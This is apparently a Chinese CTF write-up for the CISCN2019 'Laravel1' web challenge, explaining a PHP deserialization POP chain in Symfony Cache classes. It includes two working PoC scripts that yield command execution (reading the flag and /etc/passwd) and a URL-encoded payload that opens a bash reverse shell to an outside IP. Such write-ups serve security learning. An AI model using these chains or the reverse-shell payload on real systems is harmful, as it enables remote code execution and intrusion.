[CISCN2019 总决赛 Day1 Web4]Laravel1
2024-08-30 09:59:29
0x00 知识点
这个题核心就是找POP链,看了一下网上的WP,难顶啊。。
先贴上思路和poc,之后等熟练了再来做吧
https://glotozz.github.io/2019/11/05/buuctf-wp-4/
POP链:
<?php
namespace Symfony\Component\Cache;
class CacheItem
{
protected $innerItem = 'cat /flag';
}
namespace Symfony\Component\Cache\Adapter;
class ProxyAdapter
{
private $setInnerItem = 'system';
}
class TagAwareAdapter
{
public $deferred = [];
public function __construct()
{
$this->pool = new ProxyAdapter();
}
}
$a = new TagAwareAdapter();
$a -> deferred = array('a' => new \Symfony\Component\Cache\CacheItem);
echo urlencode(serialize($a));
链接2:
https://xz.aliyun.com/t/5816#toc-3
<?php
namespace Symfony\Component\Cache{
use Symfony\Component\Cache\Adapter\ProxyAdapter;
final class CacheItem{
protected $key;
protected $value;
protected $isHit = false;
protected $expiry;
protected $defaultLifetime;
protected $metadata = [];
protected $newMetadata = [];
protected $innerItem;
protected $poolHash;
protected $isTaggable = false;
public function __construct()
{
$this->expiry = 'sjdjfkas';
$this->poolHash = '123';
$this->key = '';
}
}
}
namespace Symfony\Component\Cache\Adapter{
use Symfony\Component\Cache\CacheItem;
use Symfony\Component\Ldap\Adapter\ExtLdap\Adapter;
class PhpArrayAdapter{
private $file;
public function __construct()
{
$this->file = '/etc/passwd';
}
}
class ProxyAdapter{
private $namespace;
private $namespaceLen;
private $createCacheItem;
private $setInnerItem;
private $poolHash;
private $pool;
public function __construct()
{
$this->pool = new ChainAdapter();
$this->createCacheItem = 'call_user_func';
$this->namespace = 'phpinfo';
}
}
class TagAwareAdapter{
private $deferred = [];
private $createCacheItem;
private $setCacheItemTags;
private $getTagsByKey;
private $invalidateTags;
private $tags;
private $knownTagVersions = [];
private $knownTagVersionsTtl;
private $pool;
public function __construct()
{
$this->deferred = array('flight' => new CacheItem());
$this->pool = new PhpArrayAdapter();
}
}
}
namespace {
use Symfony\Component\Cache\Adapter\TagAwareAdapter;
$obj = new TagAwareAdapter();
echo urlencode(serialize($obj));
}
官方payload:
http://localhost/pop_chain/laravel/public/index.php/index?payload=O%3A47%3A%22Symfony%5CComponent%5CCache%5CAdapter%5CTagAwareAdapter%22%3A2%3A%7Bs%3A57%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CTagAwareAdapter%00deferred%22%3Ba%3A1%3A%7Bi%3A1%3BO%3A33%3A%22Symfony%5CComponent%5CCache%5CCacheItem%22%3A3%3A%7Bs%3A12%3A%22%00%2A%00innerItem%22%3Bs%3A45%3A%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F115.159.184.127%2F9998%200%3E%261%22%3Bs%3A11%3A%22%00%2A%00poolHash%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00%2A%00expiry%22%3Bs%3A1%3A%221%22%3B%7D%7Ds%3A53%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CTagAwareAdapter%00pool%22%3BO%3A44%3A%22Symfony%5CComponent%5CCache%5CAdapter%5CProxyAdapter%22%3A2%3A%7Bs%3A58%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CProxyAdapter%00setInnerItem%22%3Bs%3A6%3A%22system%22%3Bs%3A54%3A%22%00Symfony%5CComponent%5CCache%5CAdapter%5CProxyAdapter%00poolHash%22%3Bs%3A1%3A%221%22%3B%7D%7D";}s:6:"_flash";a:2:{s:3:"old";a:0:{}s:3:"new";a:0:{}}}
总结一下本题找POP链:
1:存在反序列化,那么难点就是寻找POP链
首先全局搜索__destruct()
2:跟进__destruct()中有我们可控的变量的方法
3、如果一个类不行,换一个然后全局搜索能利用的可控方法的类
最新文章
- 怎样才能自学好Java?
- Map工具系列-07-TFS变更集提取工具
- 【faster-rcnn】训练自己的数据集时的坑
- JAVA导出数据到excel中大数据量的解决方法
- poj1319Pipe Fitters
- ehcache 分布式集群同步数据实例
- 黑盒测试用例设计方法&理论结合实际 -> 因果图法
- LeetCode (13): 3Sum Closest
- ssh 综合
- HDU 1114 Piggy-Bank(判断是否恰好装满的背包)
- js的dom操作和函数
- 第四届河南省ACM SUBSTRING 字符串处理
- IOS成长之路-用NSXMLParser实现XML解析
- SQL Server使用sp_rename重命名约束注意事项
- adb ( Android Debug Bridge)
- SIFT feature
- Python笔记(八):web开发
- 通过css属性hack完成select样式美化,并兼容IE
- sqlserver 建表语句,获取建表语句的存储过程,包括排序规则,索引,字段说明,支持同时生成多个表
- Web Service 简介